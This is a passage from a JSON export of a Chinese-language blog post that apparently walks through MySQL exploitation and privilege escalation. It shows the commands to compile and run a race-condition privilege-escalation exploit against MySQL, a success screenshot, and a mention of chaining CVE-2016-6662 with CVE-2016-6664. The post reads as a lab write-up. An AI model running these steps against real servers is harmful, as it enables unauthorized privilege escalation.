\u7684\u60c5\u51b5\u4e0b\uff0c\u9996\u5148\u7f16\u8bd1 EXP\uff1a<\/p>\n<pre><code>gcc mysql-privesc-race.c -o mysql-privesc-race -I\/usr\/include\/mysql -lmysqlclient<\/code><\/pre>\n<p>\u6267\u884c EXP \u63d0\u6743\uff1a<\/p>\n<pre><code># .\/mysql-privesc-race \u6570\u636e\u5e93\u7528\u6237\u540d \u5bc6\u7801 \u6570\u636e\u5e93\u5730\u5740 \u6570\u636e\u5e93\n.\/mysql-privesc-race test 123456 localhost test<\/code><\/pre>\n<p>Bingo! 
\u6210\u529f\uff0c\u6700\u540e\u7684\u63d0\u6743\u6210\u529f\u7684\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057855918281.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057855918281.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8981\u60f3\u83b7\u53d6 root \u6743\u9650\u5f97\u914d\u5408 CVE-2016-6662 \u4e0e CVE-2016-6664 \u8fd9\u4e24\u4e2a\u6f0f\u6d1e\uff0c\u4f46\u662f\u56fd\u5149 CVE-2016-6664 \u6f0f\u6d1e\u590d\u73b0\u5931\u8d25\u4e86\u2026 \u6316\u4e2a\u5751\uff0c\u540e\u7eed\u6709\u673a\u4f1a\u518d\u6765\u603b\u7ed3\uff0c\u6e9c\u4e86\u6e9c\u4e86\uff5e\uff5e<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743 \u6743\u9650\u83b7\u53d6 \u6570\u636e\u5e93\u64cd\u4f5c\u6743\u9650 \u63d0\u6743\u4e4b\u524d\u5f97\u5148\u62ff\u5230\u9ad8\u6743\u9650\u7684 MySQL \u7528\u6237\u624d\u53ef\u4ee5\uff0c\u62ff\u5230 MySQL \u7684\u7528\u6237\u540d\u548c 
&#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-353","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=353"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions"}],"predecessor-version":[{"id":354,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions\/354"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=353"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}